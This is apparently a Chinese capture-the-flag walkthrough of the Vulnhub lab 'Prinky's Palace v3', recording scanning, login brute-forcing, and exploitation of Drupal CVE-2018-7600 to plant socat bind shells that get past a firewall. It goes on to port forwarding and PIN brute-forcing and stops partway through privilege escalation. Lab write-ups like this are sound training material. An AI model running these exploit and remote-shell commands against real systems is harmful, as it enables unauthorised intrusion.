Vulnhub-PrinkysPalacev3
1、主机发现
arp-scan -l 扫描同网段
2、端口扫描
nmap -sS -sV 192.168.66.185 nmap -sS -A -T4 -p- 192.168.66.185 nmap --script=vuln 192.168.66.185
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
5555/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
8000/tcp open http nginx 1.10.3
这里简略扫描一下端口,简单分析一下,8000端口有个网页,5555像是ssh,21端口tcp,我们先尝试tcp匿名访问
21端口匿名访问
这里匿名访问用户名为anonymous,密码为空密码或任意密码即可登录
这里我们打开了一个文档,我们来看一下说的什么,希望我们尽量避开一些工具,这里有个Pinky可能是用户名,先保留下来 这里是有一个防火墙配置规则
访问8000端口
这里有个用户名,我们有几种方法来进入这个后台,首先就是hydra爆破一下后台,sql注入尝试或者看下源代码 我们先sql注入一下,这里sql注入应该是失败了我们爆破一下后台
hydra -l pinkadmin -P /usr/share/wordlists/rockyou.txt 192.168.66.185 http-post-form "http://192.168.66.185:8000:user=^USER^&pass=^PASS^:error"
这里源代码有些小惊喜
这里我们知道靶机的一个服务版本,找找exp吧
3、目录扫描
gobuster dir -u http://192.168.66.185:8000 -t30 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt dirsearch -u http://192.168.66.185:8000/ -e * -i 200 nikto -h 192.168.66.185 -p 8000
这里像是出货了的样子,我们先放一边
4、指纹识别
5、寻找exp
这里在github是可以找到的,我们下载一下
这里github和exp都提示我们这个相关漏洞,我们下载exp的吧
sudo gem install highline,记得下载这个插件,然后ruby执行44449.rb 这里我们直接就可以得到一个shell
试试github的exp
到这里我们要转换其他思路了,socat建立连接,之前我们找到了一个防火墙配置文件,大概率要绕过去了
靶机执行
python cve-2018-7600-drupal7.py -t 192.168.66.185 -c "which socat" -p 8000
python cve-2018-7600-drupal7.py -t 192.168.66.185 -c "socat TCP-LISTEN:4444,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane" -p 8000
kali执行
socat FILE:`tty`,raw,echo=0 TCP:192.168.247.166:4444
6、隧道建立
python3 cve-2018-7600-drupal7.py -t 192.168.66.185 -c "socat TCP-LISTEN:4488,reuseaddr,fork, EXEC:bash,pty,stderr,setsid,sigint,sane" -p 8000 因为这个exp脚本可以执行命令来监听一个4488端口,使用socat来绕过防火墙
python3 cve-2018-7600-drupal7.py -t 192.168.66.185 -c "socat TCP-LISTEN:4488,reuseaddr,fork, EXEC:bash,pty,stderr,setsid,sigint,sane" -p 8000
socat FILE:`tty`,raw,echo=0 TCP:192.168.66.185:4488
这里找到了一串sql密码,dpink、drupink
我们尝试一下
7、尝试提权
pinkadmin DDLlBhU7uSuGiPBv1gqEL1QDM1G2Nf3SQOXQ6TT7zsAE3IBZAgup
这里查看一下端口信息,80和65534是本地监听,我们端口转发
socat TCP-LISTEN:4499,fork TCP:127.0.0.1:80 &
socat TCP-LISTEN:4466,fork TCP:127.0.0.1:65334 &
这里就是把80端口、65334端口用4499、4466转发
这里我们爆破一下 使用crunch命令生成指定范围内的爆破字典文件为暴力破解做准备 crunch 3 5 -f /usr/share/crunch/charset.lst lalpha -o pinkdbcrunsh gobuster dir -u http://192.168.66.185:4466 -w pinkdbcrunsh -x db
这里爆出来一个目录,我们访问一下
我们把这些密码放到文档里当作密码字典,把我们cat /etc/passwd的用户作为登录字典来扫一下,其实账号密码不算特别多,手动输入也可以 wfuzz -c -z file,./user.txt -z file,./pwds.txt -d 'user=FUZZ&pass=FUZ2Z&pin=22222' http://192.168.66.185:4499/login.php
爆出来了,用户名和密码,我们登录一下 但是看了网上的wp,这里的pin我们还要爆破一下 需要一个pin值,并且是5位纯数字,那么我们可以使用crunch进行生成5位纯数字字典 首先生成纯5位数字的pin码
这里我第一次遇到pin这个东西,学到了
crunch 5 5 -f /usr/share/crunch/charset.lst numeric -o pin.txt
wfuzz -t 150 -w pin -c -d "user=pinkadmin&pass=AaPinkSecaAdmin4467&pin=FUZZ" http://192.168.247.166:8888/login.php
我们拿着这三个信息登录一下
一个命令执行模块
或许可以尝试以下nc连接,但是这个靶机有防火墙,我们需要socat连接 命令框输入
socat TCP-LISTEN:6666,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
kali执行
socat FILE:`tty`,raw,echo=0 TCP:192.168.66.185:6666
这条命令是将bin文件丢到html,也就是我们可以访问的页面
我们执行了之后需要一个so文件
查看函数,这个so文件的函数